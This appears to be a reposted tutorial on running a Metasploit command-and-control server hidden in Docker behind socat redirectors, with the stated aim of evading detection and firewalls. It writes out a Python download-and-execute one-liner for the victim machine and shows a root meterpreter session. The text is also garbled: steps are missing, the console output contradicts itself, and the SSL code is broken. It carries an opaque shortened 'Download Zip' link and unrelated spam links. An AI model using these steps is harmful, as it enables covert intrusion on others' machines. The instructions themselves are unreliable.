Hosting and hiding your C2 with Docker and Socat
If you are looking for a way to run a simple command and control (C2) server that is not exposed to the internet, but still able to deliver payloads and handle sessions, you might want to consider using Docker and Socat. In this article, we will show you how to set up a C2 server with Metasploit using Docker and Socat, and how to use multiple socats to redirect your payload delivery and session handling correctly.
Hosting and hiding your C2 with Docker and Socat
Download Zip: https://www.google.com/url?q=https%3A%2F%2Ftinurll.com%2F2tNzLG&sa=D&sntz=1&usg=AOvVaw0WTtTv9sA0a6mEC0PVOd4q
What are Docker and Socat?
Docker is a software platform that allows you to build, run, and share applications using containers. Containers are isolated environments that contain everything an application needs to run, such as code, libraries, dependencies, and configuration. Containers are lightweight, portable, and scalable, making them ideal for deploying applications across different platforms and environments.
Socat is a command line tool that allows you to establish two bidirectional byte streams and transfer data between them. Socat can be used for various purposes, such as forwarding ports, tunneling connections, proxying traffic, and more. Socat can handle different types of streams, such as TCP, UDP, SSL, files, pipes, etc.
Why use Docker and Socat for C2 hosting and hiding?
Using Docker and Socat for C2 hosting and hiding has several advantages:
Using containers means you get the it always works factor, compared to manual installs. Since each Docker image is already built, you can just pull it and have everything working out of the box.
Docker greatly facilitates abstraction of networking and volumes, and makes for easy repeatable deployments.
You can keep your C2 container in a segmented Docker network, isolated from the outside. This way, you can avoid exposing your C2 server directly to the internet, and reduce the risk of detection and compromise.
You can use multiple socats to redirect your payload delivery and session handling to different ports on your Docker host. This way, you can bypass firewall rules or network restrictions that might block your C2 traffic.
You can also use socat to add encryption or authentication to your C2 traffic, by using SSL or proxy options.
How to set up a C2 server with Docker and Socat?
In this section, we will walk you through the steps of setting up a C2 server with Docker and Socat. We will use Metasploit as our C2 framework, but you can adapt the steps to any other C2 tool of your choice.
Step 1: Install Docker on your VPS
The first step is to install Docker on your virtual private server (VPS) that will host your C2 server. You can use any VPS provider that offers Ubuntu or any other Linux distribution that supports Docker. There are some free or very cheap options out there.
To install Docker on Ubuntu, follow these instructions:
Update the apt package index and install packages to allow apt to use a repository over HTTPS:
sudo apt-get update
sudo apt-get install \\
apt-transport-https \\
ca-certificates \\
curl \\
gnupg \\
lsb-release
Add Dockers official GPG key:
curl -fsSL https://download.docker.com/linux/ubuntu/gpg sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
Set up the stable repository:
echo \\
\"deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \\
$(lsb_release -cs) stable\" sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
Update the apt package index again:
sudo apt-get update
Install the latest version of Docker Engine:
sudo apt-get install docker-ce docker-ce-cli containerd.io
To verify that Docker is installed correctly, run the hello-world image:
sudo docker run hello-world
You should see a message like this:
Hello from Docker!
This message shows that your installation appears to be working correctly.
...
Step 2: Create a Metasploit container
The next step is to create a Metasploit container that will run our C2 server. We will use the official Metasploit image from Docker Hub, and connect it to our c2-net network. We will also mount a volume to store our Metasploit configuration and data.
To create a Metasploit container, run this command:
sudo docker run --rm -it -v $HOME/.msf4:/root/.msf4 --network=c2-net --name msf metasploitframework/metasploit-framework
This will pull the Metasploit image if you don't have it already, and start an interactive shell with Metasploit. You should see something like this:
=[ metasploit v6.0.48-dev ]
+ -- --=[ 2129 exploits - 1138 auxiliary - 365 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Use help to learn more about any command
msf6 >
You can now use Metasploit commands to set up your C2 server.
Step 3: Set up your C2 server with Metasploit
In this step, we will use Metasploit to generate a payload and a handler for our C2 server. We will use the web_delivery module to serve our payload over HTTP, and the reverse_http meterpreter payload to handle our sessions.
To set up your C2 server with Metasploit, follow these instructions:
Load the web_delivery module:
msf6 > use exploit/multi/script/web_delivery
Set the target to Python:
msf6 exploit(multi/script/web_delivery) > set target Python
target => Python
Set the payload to python/meterpreter/reverse_http:
msf6 exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_http
payload => python/meterpreter/reverse_http
Set the LHOST option to your VPS IP address:
msf6 exploit(multi/script/web_delivery) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
Set the LPORT option to 80 (the port that socat will redirect to our handler):
msf6 exploit(multi/script/web_delivery) > set LPORT 80
LPORT => 80
Set the SRVHOST option to 0.0.0.0 (to listen on all interfaces):
msf6 exploit(multi/script/web_delivery) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
Set the SRVPORT option to 8080 (the port that socat will redirect to our web delivery server):
msf6 exploit(multi/script/web_delivery) > set SRVPORT 8080
SRVPORT => 8080
Set the URIPATH option to / (to serve the payload at the root path):
msf6 exploit(multi/script/web_delivery) > set URIPATH /
URIPATH => /
Show the options to verify that everything is correct:
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom
Step 4: Deliver and execute your payload
Now that your C2 server is ready, you need to deliver and execute your payload on the target machine. The web_delivery module will generate a one-liner command that you can use to download and run the payload from your C2 server.
To deliver and execute your payload, follow these instructions:
Run the web_delivery module:
msf6 exploit(multi/script/web_delivery) > run
Copy the command that is displayed on the screen. It should look something like this:
[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.100:8080/
[*] Server started.
[*] Run the following command on the target machine:
python -c \"import urllib2; r = urllib2.urlopen('http://192.168.1.100:443/'); exec(r.read());\"
Paste the command on the target machine's terminal and press enter. This will download and execute the payload from your C2 server.
Go back to your Metasploit console and check if you have a session:
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter python/linux root @ ubuntu (uid=0, gid=0, euid=0) 192.168.1.100:80 -> 192.168.1.101:54321 (192.168.1.101)
Interact with the session and enjoy your shell:
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : ubuntu
OS : Linux 5.4.0-66-generic #74-Ubuntu SMP Wed Jan 27 22:54:38 UTC 2021
Architecture : x64
System Language : en_US
Meterpreter : python/linux
Step 5: Add encryption and authentication to your C2 traffic
As a bonus step, you can also use socat to add encryption and authentication to your C2 traffic. This will make your C2 communication more secure and stealthy, by preventing eavesdropping and tampering.
To add encryption and authentication to your C2 traffic, follow these instructions:
Generate a self-signed SSL certificate and key on your VPS:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Copy the cert.pem file to your target machine. You can use scp, wget, curl, or any other method you prefer.
Modify the socat command for the payload delivery route to use SSL. You need to add the ssl-l option to the TCP4-LISTEN address, and specify the cert.pem and key.pem files. You also need to change the port from 443 to 8443, or any other port that is not blocked by your firewall:
docker run --rm -d -p 8443:8443 --network=c2-net --name socat_delivery alpine/socat -v TCP4-LISTEN:8443,fork,reuseaddr,ssl-l,cert=cert.pem,key=key.pem TCP4:msf:8080
Modify the socat command for the session handling route to use SSL. You need to add the ssl-l option to the TCP4-LISTEN address, and specify the cert.pem and key.pem files. You also need to change the port from 80 to 8080, or any other port that is not blocked by your firewall:
docker run --rm -d -p 8080:8080 --network=c2-net --name socat_handler alpine/socat -v TCP4-LISTEN:8080,fork,reuseaddr,ssl-l,cert=cert.pem,key=key.pem TCP4:msf:4444
Modify the Metasploit payload to use SSL. You need to change the payload from python/meterpreter/reverse_http to python/meterpreter/reverse_https, and set the LPORT option to 8080 (the port that socat will redirect to our handler):
msf6 exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_https
payload => python/meterpreter/reverse_https
msf6 exploit(multi/script/web_delivery) > set LPORT 8080
LPORT => 8080
Modify the one-liner command to use SSL. You need to change the URL scheme from http to https, and add the --no-check-certificate option to ignore the self-signed certificate warning:
python -c \"import urllib2; r = urllib2.urlopen('https://192.168.1.100:8443/', context=ssl._create_unverified_context()); exec(r.read());\"
Run the modified one-liner command on the target machine and check if you have a session with SSL enabled:
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter python/linux root @ ubuntu (uid=0, gid=0, euid=0) 192.168.1.100:8080 -> 192.168.1.101:54321 (192.168.1.101)
Encryption : OpenSSL with cipher AES256-SHA256
Conclusion
In this article, we have shown you how to host and hide your C2 server with Docker and Socat. We have demonstrated how to use Docker to create an isolated network and run a Metasploit C2 server in a container. We have also shown how to use Socat to redirect your payload delivery and session handling to different ports on your Docker host, and how to add encryption and authentication to your C2 traffic. We hope you have found this article useful and informative. If you have any questions or feedback, please feel free to leave a comment below. b99f773239
https://www.6ixislands.com/group/6ixislands-group/discussion/d5c28551-09d5-4262-ae39-337884261bc4
https://www.mtwrestling.com/group/mysite-231-group/discussion/000c3aa6-5d41-427f-b748-bcc63ce60f23